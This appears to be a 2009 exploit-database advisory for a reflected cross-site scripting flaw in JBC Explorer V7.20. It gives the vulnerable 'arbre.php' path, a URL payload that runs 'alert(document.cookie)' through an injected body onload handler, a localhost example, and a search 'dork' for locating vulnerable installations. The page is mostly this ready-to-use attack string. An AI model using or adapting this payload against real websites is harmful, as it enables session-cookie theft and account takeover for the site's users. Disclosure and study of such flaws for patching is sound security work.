Explorer 7.20 - Cross-Site Scripting



EKU-ID: 18092 CVE: OSVDB-ID:
Author: Metropolis Published: 2009-12-20 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


###########################################
#
# Script Name : Explorer V7.20
#
# Version :  V7.20 Release Candidate 1 REV A
#
# Bug Type : XSS vulnerability
#
# Found by : Metropolis
#
# Discovered : 20 December 2009
#
# Download app : http://www.jbc-explorer.info/?action=download&download=16
#
# Dork : JBC explorer [ by Psykokwak & XaV ]
#
###########################################

PoC :

http://[target]/[path]/dirsys/arbre.php?0=search&last=1[Xss]

example :

http://[target]/[path]/dirsys/arbre.php?0=search&last=1<body+onload=alert(document.cookie)>

local Example :

http://localhost/album/dirsys/arbre.php?0=search&last=1<body+onload=alert(document.cookie)>

[ Greetz:

[~]: Frf2 Az£L Z£L EsSandRe ticlem007 the killers themic Lariane All www.metropolis.thebigbang.fr :[~]